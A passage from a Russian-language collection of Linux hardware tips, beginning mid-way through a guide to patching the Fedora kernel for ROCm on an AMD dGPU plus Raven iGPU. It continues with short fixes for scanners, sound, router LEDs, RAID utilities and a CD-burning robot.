двое разработчиков ROCm под никами fxkamd и Djip007 сформировали патч для драйвера amdkfd, позволяющий на этапе загрузки ядра сказать драйверу amdkfd, какую модель памяти использовать и какие адаптеры допустимы в дереве топологии amdkfd, скажем "Большое Спасибо!" им за это. (04) Копируем патч в каталог ${HOME}/rpmbuild/SOURCES/ $ cp 003-allows-to-choose-iGPU-or-dGPU-memory-management-mode.patch.txt ${HOME}/rpmbuild/SOURCES/003-allows-to-choose-iGPU-or-dGPU-memory-management-mode.patch Исправляем в kernel.spec %global baserelease 300 на произвольное большее %global baserelease 307 Добавляем в kernel.spec после описания всех патчей, после строки Patch536: ..... строку с описанием нового патча Patch537: 0003-allows-to-choose-iGPU-or-dGPU-memory-management-mode.patch как раз перед строкой # END OF PATCH DEFINITIONS Делаем линк kernel.spec: $ cd ${HOME}/rpmbuild/SPECS/ $ ln ../SOURCES/kernel.spec Запускаем сборку пакетов ядра с патчем: $ rpmbuild -ba --nodebuginfo --target x86_64-redhat-linux --define "%_without_debug 1" --define "%set_build_flags echo" --define "%make_build make" --define "%make_install make install DESTDIR=%{buildroot}" kernel.spec Внимание, потребуется много места на диске! В моём случае сборки для x86_64 конфигов это было около 27 GB временных файлов. По завершении сборки в директории ${HOME}/rpmbuild/RPMS/x86_64/ будут лежать новые пакеты: kernel-5.3.16-307.fc31.x86_64.rpm kernel-core-5.3.16-307.fc31.x86_64.rpm kernel-debuginfo-5.3.16-307.fc31.x86_64.rpm kernel-debuginfo-common-x86_64-5.3.16-307.fc31.x86_64.rpm kernel-devel-5.3.16-307.fc31.x86_64.rpm kernel-modules-5.3.16-307.fc31.x86_64.rpm kernel-modules-extra-5.3.16-307.fc31.x86_64.rpm Устанавливаем это новое ядро и его модули (естественно, с опцией --nogpgcheck). (05) Обновляем загружаемый микрокод для видеокарт: # dnf upgrade linux-firmware libclc (06) Добавляем в настройки dracut несколько опций # cat /etc/dracut.conf.d/my20200224.conf add_drivers+=" amd_iommu_v2 amdgpu nvme_core nvme " fw_dir+=" /lib/firmware/amdgpu " install_items+=" /lib/firmware/amdgpu/raven_* /lib/firmware/amdgpu/polaris* " (07) Аккуратно настраиваем X-сервер в /etc/X11/xorg.conf. Чтобы он видел dGPU как первичный адаптер, а iGPU , как вторичный адаптер без экрана. Однако к монитору iGPU должен быть подключен физически (или к его HW-эмулятору). Создаём шаблон xorg.conf командой: # X -configure Затем копируем его в /etc/X11/xorg.conf и редактируем, оставляя:
Layout0 с двумя картами Card0 и Card1
Card0 это первичный dGPU с монитором и экраном, с точным указанием BusID
Card1 это вторичный iGPU без монитора и без экрана, с точным указанием BusID Например: Section "Device" # dGPU Identifier "Card0" Driver "amdgpu" BusID "PCI:1:0:0" Option "TearFree" "True" Option "Accel" "True" EndSection Section "Device" # iGPU Identifier "Card1" Driver "amdgpu" BusID "PCI:9:0:0" EndSection Ваши GPU могут иметь другие номера на шине pci, смотрим командой: # lspci -v ..... Пропускаем секции "Monitor1" и "Screen1" для iGPU в нашем случае, как это регламентировано в мануале для xorg.conf. Просто комментируем соответствующие разделы: #Section "Monitor" # Identifier "Monitor1" ..... #Section "Screen" # Identifier "Screen1" ..... (08) Добавляем опцию для kfd из рекомендаций установки ROCm: # cat /etc/udev/rules.d/70-kfd.rules SUBSYSTEM=="kfd", KERNEL=="kfd", TAG+="uaccess", GROUP="video", MODE="0660" Это позволит работать с dGPU пользователю из группы video. (09) Перегенерим initramfs: # dracut --force --kver 5.3.16-307.fc31.x86_64 (10) Добавляем в настройки grub2 несколько опций ядра для загрузки: amd_iommu=fullflush iommu=pt video=efifb:off amdgpu.rocm_mode=2 (11) Дополнительно, устанавливаем воркэраунд от некогерентности кэша для GCN 1,2,3,5 видеокарт: # cat /etc/environment AMD_DEBUG=nongg,nodma RADV_DEBUG=nongg DRI_PRIME=0 К сожалению, воркэраунды снижают производительность от 1.5 до 15 раз (судя по тесту Glmark2), но зато дают стабильность GUI-десктопу. Для RDNA 1,2 видеокарт вроде бы это не нужно, но я не проверял, так как не на чем. Перезагружаемся. (12) Настраиваем в EFI dGPU как первичную видеокарту, а iGPU, соответственно, становится вторичной видеокартой, урезаем ей RAM до 64 MB. Загружаемся. Вот и всё. Проверка Теперь проверяем корректность результата. # dmesg | grep -i -e amdgpu -e kfd -e drm -e ttm -e atomic -e crat ..... [ 3.414606] kfd kfd: Ignoring ACPI CRAT on disabled iGPU (rocm_mode!=ROCM_MODE_IGPU) ..... [ 3.667325] kfd kfd: added device 1002:wxyz ..... [ 3.733956] kfd kfd: skipped DID 15dd, don't support dGPU memory management models ..... Выбрана модель памяти для dGPU, добавление iGPU в топологию kfd пропущено, а топология kfd для dGPU сформирована правильно. # lspci -nnk -d 1002: 01:00.0 VGA compatible controller [0300]: Advanced Micro Devices, Inc. [AMD/ATI] ..... Subsystem: ..... Kernel driver in use: amdgpu Kernel modules: amdgpu 09:00.0 VGA compatible controller [0300]: Advanced Micro Devices, Inc. [AMD/ATI] Raven Ridge [Radeon Vega Series / Radeon Vega Mobile Series] [1002:15dd] (rev c8) Subsystem: ..... Kernel driver in use: amdgpu Kernel modules: amdgpu 09:00.1 Audio device [0403]: Advanced Micro Devices, Inc. [AMD/ATI] Raven/Raven2/Fenghuang HDMI/DP Audio Controller [1002:15de] Subsystem: ..... Kernel driver in use: snd_hda_intel Kernel modules: snd_hda_intel Всем видны оба видео-адаптера AMD на pci шине: и dGPU и iGPU. Важно, чтобы неиспользуемый iGPU контроллировался ядерным драйвером amdgpu. Если этого не будет (например, можно удалить устройства из дерева pci средствами udev на раннем этапе загрузки), то iGPU будет сильно греть APU (max 75*C вместо max 60*C). И это при том, что сам iGPU вообще не будет никак использоваться. Может возникнуть впечатление, что появились проблемы с кулером APU, но это не так. $ less /var/log/Xorg.0.log [ 15.962] (**) ServerLayout "Layout0" [ 15.962] (**) |-->Screen "Screen0" (0) [ 15.962] (**) | |-->Monitor "Monitor0" [ 15.962] (**) | |-->Device "Card0" [ 15.962] (**) | |-->GPUDevice "Card1" [ 15.962] (**) |-->Input Device "Mouse0" [ 15.962] (**) |-->Input Device "Keyboard0" ..... [ 15.964] (II) xfree86: Adding drm device (/dev/dri/card0) [ 15.970] (II) xfree86: Adding drm device (/dev/dri/card1) [ 15.973] (--) PCI:*(1@0:0:0) ..... [ 15.973] (--) PCI: (9@0:0:0) ..... ..... [ 15.979] (II) LoadModule: "amdgpu" [ 15.980] (II) Loading /usr/lib64/xorg/modules/drivers/amdgpu_drv.so ..... [ 15.983] (II) AMDGPU: Driver for AMD Radeon: All GPUs supported by the amdgpu kernel driver [ 15.983] (II) modesetting: Driver for Modesetting Kernel Drivers: kms [ 15.983] (II) AMDGPU(0): [KMS] Kernel modesetting enabled. ..... Т.е. видим, что X-сервер обнаружил обе видеокарты, но активно использует только одну и именно дискретную видеокарту. Далее можем, например, установить ROCm 3 _без_ dkms драйвера в соответствие с родной инструкцией: # dnf install rocm-dev rocm-libs Следующие программы дополнительно покажут корректность описанной выше пошаговой настройки. rocm-smi нормально отображает всю статистику по dGPU и управляет ею. rocminfo отрабатывает без ошибок и отображает 2 вычислительных агента CPU и gfx803. clinfo отрабатывает без ошибок и отображает 1 платформу AMD-APP и 1 устройство gfx803 (не считая Mesa Clover и Pocl). hashcat видит устройство и работает нормально. (Самосборный пакет из оригинальных исходников, т.к. из репозитория Fedora 31 сборка имеет урезанную функциональность и проблемы с запуском.) Компилятор AOMP в составе ROCm 3.1 проходит успешно 67 тестов из 69 из приложенного набора тестов smoke. vainfo , vdpauinfo отрабатывают нормально. Итоги В результате настройки получаем устойчивый GUI-десктоп с корректно работающим dGPU и с условно корректно отключенным, "не используемым" iGPU. Дополнительно PS: Пока удалось нарушить работу dGPU, только используя в Avidemux HW-кодер "Intel AVC HW (VA)". В то же время HW-кодер "Intel HEVC" в Avidemux работает довольно быстро. А "Intel H264" не работает совсем, и, судя по всему, встройка тут не при чём. Запуск командой: $ ( DRI_PRIME=1 avidemux3_qt5 ) позволяет использовать встроенные HW-кодеры "не используемого" iGPU, работают они примерно так же. PPS: В принципе, в ядро 5.6 были добавлены полезные патчи для Raven iGPU, и, с применением воркэраунда для Mesa 19.2.8 # cat /etc/environment AMD_DEBUG=nongg,nodma,nodcc RADV_DEBUG=nongg DRI_PRIME=0 стало возможным использовать Raven iGPU как первичную видеокарту в EFI, а dGPU использовать вторичной видеокартой. Соответственно, просто меняем местами BusID карт в xorg.conf , и включаем вторичную dGPU в MATE: меню System -> Control Center -> Displays -> второй дисплей , ON , Applay , Close (настройка сохраняется в ${HOME}/.config/dconf/). В этом случае производительность dGPU в графике снижается. Зато появляется возможность работать с tensorflow-rocm при 100% нагрузке dGPU без замираний первичного экрана, и наблюдать происходящее в процессе. И, однако, попутно выясняется, что ядро 5.6.8 (со своим таким же патчем с той же веб-странички) _не_ загружается с primary dGPU в EFI. Возможно, что для сочетаний конкретных APU и MainBoard это вылечится обновлением Grub2 до актуальной версии. Вероятно, старая версия Grub2 неправильно транслирует какие-то параметры ядру из EFI. Этот момент и более поздние версии ядер 5.6.n и 5.7.n , пардон, проверить не успел, т.к. заапгрейдил APU на обычный CPU Ryzen без iGPU. Перспективы Общие соображения, которые с одной стороны можно было бы и не добавлять в статью, а с другой, почему бы и не добавить. Судя по всему, RDNA 1 и 2 как архитектуры GPU есть шаги по направлению к когерентной архитектуре Gen-Z. Это означает, что:
основной свичованой шиной станет CCIX как приоритезированный PCIe Gen4 (и выше)
RAM будет выделена в отдельные модули на CCIX-шине
контроллер памяти будет в диспетчере и каждом модуле RAM
кэши CPU, GPU, RAM, плат расширения будут когерентны
IOMMUv2 (или выше) будет обязателено by design
GPU станут более самостоятельными относительно CPU (как вычислительные устройства)
iGPU / APU не вполне вписываются в эту концепцию Выводы, конечно же, каждый сделает сам.

Установка прав на использование USB сканера в Ubuntu 8.10 Автор: kmax [комментарии]

В правилах udev не было моего сканера, и поэтому сканер работал только через sudo $ sudo scanimage -L device 'gt68xx:libusb:003:003' is a Mustek ScanExpress 1248 UB flatbed scanner $ scanimage -L No scanners were identified. If you were expecting something different, check that the scanner is plugged in, turned on and detected by the sane-find-scanner tool (if appropriate). Please read the documentation which came with this software (README, FAQ, manpages). Решение. смотрим: $ sudo sane-find-scanner видим: found USB scanner (vendor=0x055f, product=0x021f [USB Scanner], chip=GT-6816) at libusb:003:002 Если в правилах udev для сканеров нет vendor=0x055f, product=0x021f, то файлу устройства не присвоят правильную группу $ sudo vi /etc/udev/rules.d/50-libsane-extras.rules (у вас может быть другой файл, найти его не составит труда) И по аналогии добавляем наш сканер добавляем в группу scanner всех нужных пользователей $ sudo vi /etc/group $ sudo /etc/init.d/udev restart $ scanimage -L device 'gt68xx:libusb:003:002' is a Mustek ScanExpress 1248 UB flatbed scanner xsane тоже заработал Те же действия могут помочь в аналогичных ситуациях с другими редкими устройствами

JFFS и мониторинг активности wifi на роутере Linksys WRT54GL (доп. ссылка 1) Автор: Sergey Volhin [обсудить]

Расскажу о двух возможностях, которые можно реализовать на роутере с прошивкой DD-WRT на примере роутера Linksys WRT54GL. 1) Файловая система JFFS. На роутере можно без труда организовать небольшое энергонезависимое хранилище файлов. Для этого в веб-интерфейсе включаем поддержку jffs (по туториолу из официального вики dd-wrt): 1. Откройте вкладку "Administration". 2. Перейдите к секции "JFFS2 Support". 3. Кликаем "Enable JFFS". 4. Затем жмём "Save". 5. Ждём несколько секунд и жмём "Apply". 6. Опять ждём. Идём обратно к опции "Enable JFFS", кликаем "Clean JFFS". 7. Не кликая "Save", жмём вместо этого "Apply". Теперь если мы приконнектимся к роутеру по ssh команда "df -h" расскажет нам о наличие новой файловой системы, смонтированной в каталоге /jffs/, и её размере (размер очень сильно зависит от типа вашей прошивки, для получения хоть сколько-нибудь полезного свободного пространства для jffs рекомендуется установить mini-версию dd-wrt). 2) Индикация активности wifi по лампе на корпусе роутера. Теперь используем возможности jffs - разместим на ней скрипт (с того же вики dd-wrt), который заставляет гореть лампу янтарным светом при подключенных wifi-клиентах и мигать белым при трансфере данных через WLAN. Для установки скрипта: 1. Коннектимся по ssh. 2. Переходим в каталог /jffs/ и создаем директорию bin: # cd /jffs/ # mkdir ./bin 3. Как видно /jffs/bin уже прописан в переменной поиска команд PATH: # echo $PATH /bin:/usr/bin:/sbin:/usr/sbin:/jffs/sbin:/jffs/bin:/jffs/usr/sbin:/jffs/usr/bin 4. Создаем файл скрипта (# vi ./wlan.sh) со следующим содержанием: #!/bin/sh I=`nvram get wl0_ifname` while sleep 1; do if [ "`wl assoclist`" != "" ]; then XFER=`ifconfig $I|grep bytes` if [ "$XFER" != "$PXFER" ]; then LED='gpio disable 3 ; gpio disable 2' PXFER=$XFER else LED='gpio disable 3 ; gpio enable 2' fi else LED='gpio enable 3 ; gpio enable 2' fi if [ "$LED" != "$PLED" ]; then eval $LED PLED=$LED fi done 5. Делаем скрипт исполняемым: # chmod +x ./wlan.sh Готово! Скрипт теперь можно запускать командой wlan.sh или прописать в автозагрузку. Оригинал в блоге по ссылке: http://damnsmallblog.blogspot.com/2008/03/jffs-wifi-linksys-wrt54gl.html

Как избавиться от щелчков при запуске приложений на системах с чипами Intel (доп. ссылка 1) Автор: Аноним [комментарии]

При щелчках в колонках в процессе работы следует выключить режим энергосбережения у звукового драйвера: sudo tee /etc/modprobe.d/snd-hda-intel.conf <<< "options snd_hda_intel power_save=0"

Решение проблемы с исчезновением устройств вывода звука в Ubuntu 20.04 (доп. ссылка 1) (доп. ссылка 2) Автор: Аноним [комментарии]

Пропал звук. Pulseaudio показывает в качестве выходного устройства Dummy Output. Звуковая карта snd-hda-intel. Манипуляции echo "options snd-hda-intel model=generic" | sudo tee -a /etc/modprobe.d/alsa-base.conf echo "options snd-hda-intel dmic_detect=0" | sudo tee -a /etc/modprobe.d/alsa-base.conf echo "blacklist snd_soc_skl" | sudo tee -a /etc/modprobe.d/blacklist.conf с перезагрузкой не дали ничего. Потом стал вспоминать, что делал до того, как исчез звук. Подключал Bluetooth колонки. Залез в настройки Bluetooth, потёр всё. Звук появился. Какой-то глюк в bluez5. В другой ситуации звук исчез (также остался только "dummy output") после обновления с Ubuntu 18.04 до 20.04. Помогло удаление пакета timidity: sudo apt purge timidity-daemon

Решение проблемы с зависанием графической подсистемы на компьютерах с APU AMD (доп. ссылка 1) [комментарии]

При использовании ядер Linux 5.2+ на компьютерах с APU AMD (например, Ryzen 5) отмечаются зависания графической подсистемы, устраняемые только перезагрузкой. При зависании в логе отображаются записи вида "drm:amdgpu... Waiting for fences timed out or interrupted!". Кроме отката системы на старые выпуски ядра Linux, в качестве обходного варианта блокирования проблемы помогает загрузка ядра с параметром "amdgpu.noretry=0".

Отключение wakeup для PCIe устройств Автор: Аноним [комментарии]

Краткий экскурс в историю или как это было раньше. В файле /proc/acpi/wakeup перечислены устройства и возможность пробуждать компьютер из S3 с их стороны. Структура файла wakeup достаточна проста: <acpi device name> <S-state> <Status> <Sysfs node> Небольшой пример cat /proc/acpi/wakeup | grep enabled EHC1 S4 *enabled pci:0000:00:1d.0 XHC S4 *enabled pci:0000:00:14.0 LID0 S3 *enabled platform:PNP0C0D:00 Для отключения замечательной функции "Пробуждение по клику мышки" ранее требовалось просто сделать echo EHC1 > /proc/acpi/wakeup Современность А в современном мире устройств стало много, а имена им в dsdt таблице стали давать одинаковые. Небольшой пример: PXSX S4 *enabled pci:0000:08:00.0 PXSX S4 *enabled pci:0000:09:00.0 XHC S4 *disabled pci:0000:00:14.0 Все эти устройства - usb-контроллеры. В результате дублирования имён echo PXSX больше не работает. Лечение Вместо отключения через /proc/acpi/wakeup необходимо отключить возможность пробуждения через /sys echo disabled > /sys/bus/pci/devices/0000\\:08\\:00.0/power/wakeup echo disabled > /sys/bus/pci/devices/0000\\:09\\:00.0/power/wakeup В результате в /proc/acpi/wakeup статус изменится PXSX S4 *disabled pci:0000:08:00.0 PXSX S4 *disabled pci:0000:09:00.0 XHC S4 *disabled pci:0000:00:14.0

Способ обхода краха Firefox и OpenGL приложений из-за ошибки в видеодрайвере Intel (доп. ссылка 1) [комментарии]

В Ubuntu 14.04 и более новых выпусках при использовании KMS-драйвера i915 на системах со старыми видеочипами Intel 965GM, обычно используемыми в связке с CPU Intel Core 2 Duo, периодически начинают падать OpenGL-приложения. После загрузки некоторое время всё нормально, но после выхода из сна или перехода в полноэкранный режим попытка обращения к OpenGL приводит к выводу такой ошибки: $ glxgears intel_do_flush_locked failed: Input/output error Неприятность ситуации в том, что в таких условиях непредсказуемым образом начинает падать и Firefox, если на сайте используется WebGL или модные графические трансформации. Обходным способом решения проблемы является запуск OpenGL-программ с программной реализацией OpenGL (включается установкой переменной окружения LIBGL_ALWAYS_SOFTWARE=1), например, вместо прямого вызова в ярлык для запуска Firefox можно прописать: sh -c "LIBGL_ALWAYS_SOFTWARE=1 /usr/local/firefox/firefox" Проблема решается установкой Mesa из репозитория xorg-edgers: sudo apt-add-repository ppa:xorg-edgers/ppa sudo apt-get update sudo apt-get dist-upgrade

Подключение через USB дополнительной кнопки для автоматизации запуска работ на сервере (доп. ссылка 1) Автор: Roman Y. Bogdanov [комментарии]

Вводная часть: Дома есть "домашний" сервер. Этакая коробочка Lenovo q190 размером чуть более чем DVD box. Ещё есть МФУ samsung SCX-4220. Работает это все на ubuntu 14.04 LTS, прекрасно печатает через CUPS, прекрасно сканирует, но вот с автоматизацией не очень. Проблема: Дело в том, что на самсунге нет отдельной кнопки сканировать на компьютер, которую бы можно было перехватить и скриптом запустить скан. Внезапное решение: Недавно покупая очередную новую батарейку к своему ноутбуку заметил на витрине магазина вот такую штуку - "USB 7.1 channel sound" Такие звуковушки лежат почти в каждом магазине по 200 рублей. О думаю, а что если китайцы + кнопки и это клавиатура? Дай-те ко мне одну? Реализация: Купил, подключил к headless q190 и стал смотреть вывод $ lsusb Bus 001 Device 005: ID 0d8c:013c C-Media Electronics, Inc. CM108 Audio Controller Печально, думаю, но решил посмотреть, что ещё и в dmesg нашлось? hid-generic 0003:0D8C:013C.0002: input,hidraw0: USB HID v1.00 Device [C-Media Electronics Inc. USB PnP Sound Device] on usb-0000:00:1a.0-1.4/input3 О, то что нужно. Отлично! Кнопки звуковой карты - это по сути маленькая USB клавиатура. То что мне нужно. Для обработки нажатий воспользуемся THD (Triggerhappy - lightweight hotkey daemon) http://github.com/wertarbyte/triggerhappy В Ubuntu 14.04 он есть "искаропки". $ apt-get install thd Настройка: $ cat /etc/triggerhappy/triggers.d/brj.conf KEY_VOLUMEDOWN 1 /home/brj/bin/scanme.sh KEY_VOLUMEUP 1 /home/brj/grab-torrent.sh По клавише vol down - запускается сканирование По клавише vol up - торрент забирает свежие файлы и начинает скачку. Скрипт запускающий сканирование: #!/bin/sh outscan="scan-`date +"%Y-%m-%d-%H%M%S"`" scanimage --progress --mode Color --format=tiff --resolution 300 > /tmp/image.tiff convert /tmp/image.tiff /home/brj/Dropbox/${outscan}.jpg rm /tmp/image.tiff Практическая работа: первое время дополнительно повесил звуки из super mario и mpg123, что бы знать - работает или нет. Система работает исправно, поэтому убрал. Где ещё использовать? Такая штука ограничена только воображением и количеством кнопок. Можно интернет переключать на резервный канал, сканировать, перегружать сервера/сервисы, делать архивацию на внешний винт, вообщем на что хватит фантазии то и автоматизировать. Успехов

Как задействовать UVD для ускорения декодирования видео в Ubuntu Linux (доп. ссылка 1) [комментарии]

Для ускорения воспроизведения видео в приложениях поддерживающих API VDPAU с использованием аппаратного декодера UVD, присутствующего в GPU AMD, следует использовать свежую версию DRM-модуля radeon. Версия с поддержкой UVD войдёт в состав ядра Linux 3.10, поэтому для использования UVD до выхода данной ветки следует использовать экспериментальное ядро из репозитория drm-next. Устанавливаем заголовочные файлы для VDPAU: sudo apt-get install libvdpau-dev. Пересобираем Mesa из Git-репозитория http://cgit.freedesktop.org/mesa/mesa/ При выполнении configure следует указать опции "--with-gallium-drivers=r600 --enable-vdpau". Добавляем в файл /etc/ld.so.conf.d/z.conf строку /usr/local/lib/vdpau и запускаем команду ldconfig. Ставим пакеты с ядром drm-next (до того как выйдет ядро 3.10), доступные по ссылке http://kernel.ubuntu.com/~kernel-ppa/mainline/drm-next/ Устанавливаем прошивку UVD для используемой карты AMD. Загрузить файл с прошивкой можно на данной странице, после чего следует поместить её в директорию /lib/firmware. Перезагружаем систему. Запускаем любой проигрыватель с поддержкой VDPAU.

Как подружить Linux-ядро 3.x и утилиту LSI MegaCli (доп. ссылка 1) Автор: Andrew Okhmat [комментарии]

С переходом на ядро Linux 3.x.x владельцы LSI RAID могут столкнуться с неприятным явлением - утилита MegaCli или MegaCli64 перестаёт обнаруживать RAID-контроллер. Ядро правильно определяет и корректно работает, а утилита упорно показывает, что никакого RAID-контроллера нет. Не помогает исправить проблему и обновление MegaCli до последней версии - 8.02.16. Если мониторинг состояния RAID построен на этой утилите, то ситуация становится совсем неприятной, так как. можно пропустить вышедший из строя жесткий диск или пришедшую в негодность батарейку кэша. Попробуем разобраться в ситуации и найти временное решение, до выхода новой версии MegaCli. Посмотрим версию ядра, наличие LSI MegaRAID и вывод утилиты MegaCli: [root@farm2:1 ~]# uname -a Linux farm2.localdomain 3.2.5-3.fc16.x86_64 #1 SMP Thu Feb 9 01:24:38 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux [root@farm2:1 ~]# lspci | grep -i raid 10:00.0 RAID bus controller: LSI Logic / Symbios Logic MegaRAID SAS 2108 [Liberator] (rev 05) [root@farm2:1 ~]# /opt/MegaRAID/MegaCli/MegaCli64 -adpCount Controller Count: 0. [root@farm2:1 ~]# /opt/MegaRAID/MegaCli/MegaCli64 -v MegaCLI SAS RAID Management Tool Ver 8.02.16 July 01, 2011 (c)Copyright 2011, LSI Corporation, All Rights Reserved. Мы видим, что работаем под управлением linux-ядра 3.2.5, есть установленный LSI MegaRAID и утилита MegaCli64 его не видит. До обновления использовалось ядро 2.6.39, и утилита MegaCli64 обнаруживала контроллер. Для понимания разницы в поведении MegaCli на ядрах версий 2.6 и 3.х я использовал gdb и strace. Оказалось, что если загружено любое ядро с номером версии 2.6.x - используется актуальный набор системных вызовов, иначе используются устаревшие системные вызовы ядра 2.4.x и, соответственно, контроллер не находится. Первая мысль, которая приходит в голову: подменить системный вызов uname для утилиты MegaCli. Воспользуемся помощью LD_PRELOAD и несколькими строчками кода на C: #define _GNU_SOURCE #include <unistd.h> #include <sys/utsname.h> #include <sys/syscall.h> #include <sys/types.h> #include <string.h> int uname(struct utsname *buf) { int ret = syscall(SYS_uname, buf); strcpy(buf->release, "2.6.40"); return ret; } Компилируем: mkdir fakeuname cd fakeuname wget http://supportex.net/files/fakeuname/fakeuname.c gcc -Wall -fPIC -c fakeuname.c gcc -Wall -shared -o libfakeuname.so fakeuname.o Проверим, как будет работать утилита. При запуске будет сообщаться "фейковый" номер версии ядра - 2.6.40, вместо 3.2.5: [root@farm2:1 ~]# /opt/MegaRAID/MegaCli/MegaCli64 -adpCount Controller Count: 1. [root@farm2:1 fakeuname]# LD_PRELOAD=./libfakeuname.so /opt/MegaRAID/MegaCli/MegaCli64 -AdpAllInfo -aALL Adapter #0 ================================ Versions ================ Product Name : Serial No : SV12345678 FW Package Build: 12.12.0-0065 ... Небольшая победа - контроллер определился! Теперь можно с ним работать, как и раньше. А libfakeuname.so скопировать в более удобное место (например /usr/local/lib64) и использовать в своих скриптах совместно с LD_PRELOAD=/usr/local/lib64/libfakeuname.so. Ссылки: LSI MegaCLI Emergency Cheat Sheet LSI Documents and Downloads Debugging code with strace Debugging with gdb Creating and using shared libraries in Linux Modifying a Dynamic Library Without Changing the Source Code

Работа в Linux с автоматом записи и печати на DVD/CD дисках Primera Bravo XRP Автор: barmaley [комментарии]

Аппарат Primera Bravo XRP позволяет автоматизировать запись данных и печать маркировки на CD-диски, максимальная емкость 50 + 50 дисков. Подключается это устройство через USB. В системе появляются три устройства (через внутренний usn hub), два cdrw и lp: usb 2-2: new high-speed USB device number 62 using ehci_hcd usb 2-2: New USB device found, idVendor=04b4, idProduct=6560 usb 2-2: New USB device strings: Mfr=0, Product=0, SerialNumber=0 hub 2-2:1.0: USB hub found hub 2-2:1.0: 4 ports detected usb 2-2.1: new full-speed USB device number 63 using ehci_hcd usb 2-2.1: New USB device found, idVendor=0f25, idProduct=0012 usb 2-2.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3 usb 2-2.1: Product: CD/DVD usb 2-2.1: Manufacturer: Primera usb 2-2.1: SerialNumber: 1000001 usblp0: USB Bidirectional printer dev 63 if 0 alt 0 proto 2 vid 0x0F25 pid 0x0012 usb 2-2.3: new high-speed USB device number 64 using ehci_hcd usb 2-2.3: New USB device found, idVendor=0dbf, idProduct=0700 usb 2-2.3: New USB device strings: Mfr=2, Product=3, SerialNumber=1 usb 2-2.3: Product: USB to SATA Bridge usb 2-2.3: Manufacturer: TSI usb 2-2.3: SerialNumber: TSI08102925ad scsi10 : usb-storage 2-2.3:1.0 usb 2-2.4: new high-speed USB device number 65 using ehci_hcd usb 2-2.4: New USB device found, idVendor=0dbf, idProduct=0700 usb 2-2.4: New USB device strings: Mfr=2, Product=3, SerialNumber=1 usb 2-2.4: Product: USB to SATA Bridge usb 2-2.4: Manufacturer: TSI usb 2-2.4: SerialNumber: TSI081029002d scsi11 : usb-storage 2-2.4:1.0 scsi 10:0:0:0: CD-ROM PIONEER DVD-RW DVR-215D 9.13 PQ: 0 ANSI: 0 sr0: scsi3-mmc drive: 40x/40x writer cd/rw xa/form2 cdda tray sr 10:0:0:0: Attached scsi CD-ROM sr0 sr 10:0:0:0: Attached scsi generic sg1 type 5 scsi 11:0:0:0: CD-ROM PIONEER DVD-RW DVR-215D 9.13 PQ: 0 ANSI: 0 sr1: scsi3-mmc drive: 40x/40x writer cd/rw xa/form2 cdda tray sr 11:0:0:0: Attached scsi CD-ROM sr1 sr 11:0:0:0: Attached scsi generic sg2 type 5 На сайте производителя есть драйверы для Linux, но они работают только с принтером (печать этикеток для CD). Модель встроенного принтера, очень похоже, Lexmark Z80. Работа с роботом-автоматом производится путем посылки бинарного пакета в порт принтера (/dev/usb/lp0) Пакет состоит из 8 байт: заголовок [0x1B, 0x04], команда [byte], резерв [0x00, 0x00, 0x00, 0x00], сумма 7 байт [byte] Так же, на сайте производителя, указано что, если вы хотите получить все hex-коды, необходимо подписать Non-disclosure Agreement (NDA). Но можно и не подписывать, основные необходимые дествия уже расписаны пользователем davidef для модели Primera Bravo II. Состояние устройства можно получить через чтение порта принтера. Вы получите две строки (последняя постоянно повторяется циклически с изменениями): binary data 1, 0x0D binary data 2, 0x0D Я же подведу итог: Манипуляции с cdrw производятся как обычно через eject и cdrecord ;) Описание команд робота, на которые я получил хоть какую то реакцию: 05 - сброс устройства, пауза ~30 сек 80 - взять с левого лотка, положить на верхний CD 81 - взять с левого лотка, положить на принтер 82 - взять с левого лотка, положить на правый лоток 83 - взять с правого лотка, положить на верхний CD 84 - взять с правого лотка, положить на принтер 85 - взять с правого лотка, положить на левый лоток 86 - взять с верхнего CD положить на принтер 87 - взять с верхнего CD положить направо 88 - взять с верхнего CD положить налево 89 - взять с верхнего CD положить вниз (нижний CD либо наружу) !! не забудьте закрыть верхний CD !! 8A - взять с принтера положить направо 8B - взять с принтера положить налево 8С - взять с принтера положить на нижний CD (либо выбросит наружу) 8D - ? 8E - каретка в центр (пауза ~10 сек, возврат) 8F - каретка в центр (пауза ~10 сек, возврат) 90 - каретка влево (пауза ~10 сек, возврат) 91 - каретка в центр (пауза ~10 сек, возврат) 92 - взять диск (с последней позиции)/положить диск 93 - открыть принтер 94 - закрыть принтер 95 - каретка налево, картриджы направо, индикаторы перемигиваются, ждет какой то команды, если неверная команда происходит reset (пауза ~30 сек) 96 - каретка налево, картриджы направо, индикаторы постоянны 97 - возврат из 96 в исходное 98 - взять с принтера положить на верхний CD (либо выбросит наружу) 99 - проверяет диски в обеих лотках (слева и справа) 9A - взять слева ? 9B - опускает каретку с диском на 1 см, таймаут 10сек, поднимает в исходное 9С - каретка направо, картрижды налево, каретка вниз до упора и устройство выключается 9D - взять слева, положить на нижний CD 9E - взять справа, положить на нижний CD 9F - взять с нижнего CD положить на принтер A0 - взять с нижнего CD положить направо A1 - взять с нижнего CD положить налево A2 - взять с нижнего CD, каретка вверх, положить на нижний CD (либо выбросит наружу) A3 - каретка в центр (пауза ~10 сек, возврат) A4 - взять слева, положить на верхний CD, взять еще один диск слева A5 - взять справа, положить на верхний CD, взять еще один диск слева A6 - взять слева, положить на нижний CD, взять еще один диск слева A7 - взять справа, положить на нижний CD, взять еще один диск слева A8 - взять с принтера положить на нижний CD (либо выбросит наружу), аналогично 8C A9 - каретка в центр (пауза ~10 сек, возврат) Этого вполне достаточно для автоматизации процесса, любым скриптовым языком. Состояние устройства: binary data 1: 65 байт - состояние устройства, 0x43 (открыта крышка), 0x42 (робот в процессе манипуляций), 0x49 (в готовности, обычное состояние) binary data 2: 62 байт - количество дисков в правом лотке, после команды 99 63 байт - количество дисков в левом лотке, после команды 99

Советы по увеличению автономной работы ноутбука с Debian/Ubuntu (доп. ссылка 1) (доп. ссылка 2) [комментарии]

